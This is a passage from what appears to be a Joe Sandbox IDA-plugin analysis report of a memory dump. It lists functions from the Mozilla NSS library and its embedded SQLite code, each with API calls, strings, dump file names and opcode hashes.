free.MOZGLUE(?), ref: 6C65EA69

Strings

http://, xrefs: 6C65E935

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: 47df6804f6eb3e7fd0979e19bd2824f426550f6cdd8140705d591f7194b24161
Instruction ID: 7fe0fcbb7b569deb2ba914dc17165bbb0f9e6cbb446c0e3cb33410c7647c6dfa
Opcode Fuzzy Hash: 47df6804f6eb3e7fd0979e19bd2824f426550f6cdd8140705d591f7194b24161
Instruction Fuzzy Hash: 2641ADF9D086065BEF514A788C417EA7765AB5730CFF40021DCA497F41E21E8576C2EE

Function 6C674E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C674E90
EnterCriticalSection.KERNEL32 ref: 6C674EA9
TlsGetValue.KERNEL32 ref: 6C674EC6
EnterCriticalSection.KERNEL32 ref: 6C674EDF
PL_HashTableLookup.NSS3 ref: 6C674EF8
PR_Unlock.NSS3 ref: 6C674F05
PR_Now.NSS3 ref: 6C674F13
PR_Unlock.NSS3 ref: 6C674F3A

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Strings

bUgl, xrefs: 6C674E5C
bUgl, xrefs: 6C674F3F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUgl$bUgl
API String ID: 326028414-433878880
Opcode ID: 8c04866d5e1a484c448429671e38cb2bba25ce4b7672756b61ca3b25611e7919
Instruction ID: 43928d472bb7bf6bee02f62fa467335f81323fca9321d0c8d15164fb7999d30c
Opcode Fuzzy Hash: 8c04866d5e1a484c448429671e38cb2bba25ce4b7672756b61ca3b25611e7919
Instruction Fuzzy Hash: 64417EB4A00605DFCB00EF78C0888AABBF0FF49354B118569EC598B710EB30E855CFA5

Function 6C686C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C686C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C686C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C686CA3

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C686CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C686CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6C686C9C
pMechanism = 0x%p, xrefs: 6C686CD0
hSession = 0x%x, xrefs: 6C686C7E, 6C686C8E
nvl, xrefs: 6C686CF4, 6C686D1F
C_DigestInit, xrefs: 6C686C61

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nvl
API String ID: 1003633598-38645125
Opcode ID: 8dad9576e842aca81ca2cd24f18bfa32b0f1e9a1c020164ef6aba3e2a29f01f4
Instruction ID: c9903db8a381657514da2625c1b9aaa53de78cc17e3ab2697a7299ea8a5a6ef6
Opcode Fuzzy Hash: 8dad9576e842aca81ca2cd24f18bfa32b0f1e9a1c020164ef6aba3e2a29f01f4
Instruction Fuzzy Hash: 3521D2706021189BDB109F559E8DF9A3BB5EB46318F084035E909ABB51DF30D908CBBE

Function 6C69ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C69DE64), ref: 6C69ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C69ED22

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

PL_FreeArenaPool.NSS3(?), ref: 6C69ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C69ED6B
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C69ED38

Part of subcall function 6C5D4C70: TlsGetValue.KERNEL32(?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4C97
Part of subcall function 6C5D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CB0
Part of subcall function 6C5D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5D3921,6C7B14E4,6C71CC70), ref: 6C5D4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C69ED52
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C69ED83
PL_FreeArenaPool.NSS3(?), ref: 6C69ED95
PL_FinishArenaPool.NSS3(?), ref: 6C69ED9D

Part of subcall function 6C6B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C6B127C,00000000,00000000,00000000), ref: 6C6B650E

Strings

security, xrefs: 6C69ED06

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: dc1fbcce7e088bd83a4cced4aeb7cfe94cd7d5c838b1aaa0902f12ebf30a5fe1
Instruction ID: 28c81ebaddfb73fa214c35a6141f11110cd87732556d38ea3b25dff53e969e3a
Opcode Fuzzy Hash: dc1fbcce7e088bd83a4cced4aeb7cfe94cd7d5c838b1aaa0902f12ebf30a5fe1
Instruction Fuzzy Hash: 921127759412056BE6105A25AC84FBBB2B8BF4270CF050534E81572E61FB35E61C87EE

Function 6C760EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C642357), ref: 6C760EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C642357), ref: 6C760EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C760EE6

Part of subcall function 6C7609D0: PR_Now.NSS3 ref: 6C760A22
Part of subcall function 6C7609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C760A35
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C760A66
Part of subcall function 6C7609D0: PR_GetCurrentThread.NSS3 ref: 6C760A70
Part of subcall function 6C7609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C760A9D
Part of subcall function 6C7609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C760AC8
Part of subcall function 6C7609D0: PR_vsmprintf.NSS3(?,?), ref: 6C760AE8
Part of subcall function 6C7609D0: EnterCriticalSection.KERNEL32(?), ref: 6C760B19
Part of subcall function 6C7609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C760B48
Part of subcall function 6C7609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C760C76
Part of subcall function 6C7609D0: PR_LogFlush.NSS3 ref: 6C760C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C760EFA

Part of subcall function 6C64AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C64AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F2B

Strings

Aborting, xrefs: 6C760EB3
Assertion failure: %s, at %s:%d, xrefs: 6C760ED9, 6C760EE5, 6C760F06, 6C760F0B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 35ec7e05b92d6279d58eb15832c97f75ff31824f62fce96e2a762bc5e4bc6ef4
Instruction ID: 067482d12ba6637cb6d14ca54963ac54f3f92eb7a25781c4b4bfb7c1c1c6bd75
Opcode Fuzzy Hash: 35ec7e05b92d6279d58eb15832c97f75ff31824f62fce96e2a762bc5e4bc6ef4
Instruction Fuzzy Hash: 52F0AFB59002147BEB003BA1AC4EC9F3E2DDF82266F044034FD0956A02DA36E91496B6

Function 6C6C4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C6C4DCB

Part of subcall function 6C6B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6587ED,00000800,6C64EF74,00000000), ref: 6C6B1000
Part of subcall function 6C6B0FF0: PR_NewLock.NSS3(?,00000800,6C64EF74,00000000), ref: 6C6B1016
Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C6C4DE1

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C6C4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C4E59

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C78300C,00000000), ref: 6C6C4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C6C4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C6C4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6C521A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: b8f62f1b4c5336cd0e0a1e61c7dda2e004e718cdcfa28ab69f74114934b92c98
Instruction ID: e0e16157fa520ecd96ba953d81e385f55c060dd23c6a341fb9fac20bfd61f9dd
Opcode Fuzzy Hash: b8f62f1b4c5336cd0e0a1e61c7dda2e004e718cdcfa28ab69f74114934b92c98
Instruction Fuzzy Hash: 3DF1AE71F00209CBDB04CF54D8407AEB7B2FF89358F254129D915AB781EB75E982CB96

Function 6C6D6BA0 Relevance: 16.7, APIs: 11, Instructions: 248COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,?,?,?,?,?,?,?,6C6E0293), ref: 6C6D6BC2
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6C13
NSS_GetAlgorithmPolicy.NSS3(?), ref: 6C6D6C39
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C6D6C6C
NSS_GetAlgorithmPolicy.NSS3(00000146,?), ref: 6C6D6CAB
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6CEE
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6D2A
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6D6D
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6DBD
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6E13
PR_SetError.NSS3(FFFFD016,00000000), ref: 6C6D6EE9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error$AlgorithmPolicy
String ID:
API String ID: 644051021-0
Opcode ID: 23ff77d34a69c567e516e72d53ba48a79804f08f358fd079c2f4733f1cd388f9
Instruction ID: 83345d6ac3138c3c851ecc697c58968210323f87225f4bc79f945d62ce0015f2
Opcode Fuzzy Hash: 23ff77d34a69c567e516e72d53ba48a79804f08f358fd079c2f4733f1cd388f9
Instruction Fuzzy Hash: E5913872E0C2869BDB10DE6CDC917983671AF4233CF260B25D152EBAD1E361F546835E

Function 6C654FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C7A0148,?,6C666FEC), ref: 6C65502A
PR_NewLock.NSS3(00000001,00000000,6C7A0148,?,6C666FEC), ref: 6C655034
PL_NewHashTable.NSS3(00000000,6C6AFE80,6C6AFD30,6C6FC350,00000000,00000000,00000001,00000000,6C7A0148,?,6C666FEC), ref: 6C655055
PL_NewHashTable.NSS3(00000000,6C6AFE80,6C6AFD30,6C6FC350,00000000,00000000,?,00000001,00000000,6C7A0148,?,6C666FEC), ref: 6C65506D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 657b7862050c67390604c55c5e761525ef831130b41578b44c200cb070fcf3ba
Instruction ID: ee6e71a34298829745ec6e91d28c914b236e885fa2d0bb1f24da0190ea055af9
Opcode Fuzzy Hash: 657b7862050c67390604c55c5e761525ef831130b41578b44c200cb070fcf3ba
Instruction Fuzzy Hash: F331D0B1B03214ABEF109EA58C4CF4B3AB8EB13388F754135EA0993A40D3759815CBED

Function 6C5F2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5F2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C5F2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C5F3005
memcpy.VCRUNTIME140(?,?,?), ref: 6C5F30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5F3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5F3178

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5F3022, 6C5F3156, 6C5F3162, 6C5F318A, 6C5F3196, 6C5F31A2, 6C5F31AE, 6C5F31BA, 6C5F31C6
%s at line %d of [%.10s], xrefs: 6C5F3171
database corruption, xrefs: 6C5F316C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: f209f4f267df034bb0c6e3f1f2d3620019c51563013d68106f2847a441859bb6
Instruction ID: d1b011660477391cc7a9f5b0f0bbebeb8affa978236d4a80e2e58842c69b1bfd
Opcode Fuzzy Hash: f209f4f267df034bb0c6e3f1f2d3620019c51563013d68106f2847a441859bb6
Instruction Fuzzy Hash: 7CB18EB0E052199BEB08CF9DCC85AEEB7B1BF48304F14442AE855B7B41D7749942CFA5

Function 6C642D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C642D69

Strings

winTruncate1, xrefs: 6C642EBE
vl, xrefs: 6C642DD0
Pvl, xrefs: 6C642E74, 6C642EC5, 6C642F32, 6C642F5C
winUnmapfile2, xrefs: 6C642F7F
winSeekFile, xrefs: 6C642E9C
winTruncate2, xrefs: 6C642EF8
winUnmapfile1, xrefs: 6C642F55
@vl, xrefs: 6C642E24

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: __allrem
String ID: @vl$Pvl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$vl
API String ID: 2933888876-684076108
Opcode ID: 17f7980f34df5fe855fe4c4724e94b77a5d109bdf74fb81ff03301fe246680fd
Instruction ID: 80ab5f505efdc68576e666db2f6006c06c34b1435f198a07b7743e7e67104344
Opcode Fuzzy Hash: 17f7980f34df5fe855fe4c4724e94b77a5d109bdf74fb81ff03301fe246680fd
Instruction Fuzzy Hash: CA61AE71A002099FDB04CF68DC98AAA7BB1FF49314F20C139E915DB780EB31AD16CB94

Function 6C6469A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6C5DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C63F9C9,?,6C63F4DA,6C63F9C9,?,?,6C60369A), ref: 6C5DCA7A
Part of subcall function 6C5DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5DCB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C646A02
EnterCriticalSection.KERNEL32(?), ref: 6C646AA6
LeaveCriticalSection.KERNEL32(?), ref: 6C646AF9
sqlite3_free.NSS3(00000000), ref: 6C646B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C646BA6

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C646B9F
Pvl, xrefs: 6C646B1F
`vl, xrefs: 6C646A53
winDelete, xrefs: 6C646B71

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: Pvl$`vl$delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-543949883
Opcode ID: 1ed47182c3b93ecf43b44a193afdbb6d81f7c1712fc9405c584bdbe763062651
Instruction ID: a43d21034972a9b0d2df7938a6ee4b56560c3fa05dff1cea7832c5be8331c83a
Opcode Fuzzy Hash: 1ed47182c3b93ecf43b44a193afdbb6d81f7c1712fc9405c584bdbe763062651
Instruction Fuzzy Hash: 3951E631B002099BEB08AFA5EC69DBF3775EF46314B14C139E516D7680DB349911CB9A

Function 6C650F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C650F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C650F84

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C66F59B,6C77890C,?), ref: 6C650FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C650FC1

Part of subcall function 6C6B0BE0: malloc.MOZGLUE(6C6A8D2D,?,00000000,?), ref: 6C6B0BF8
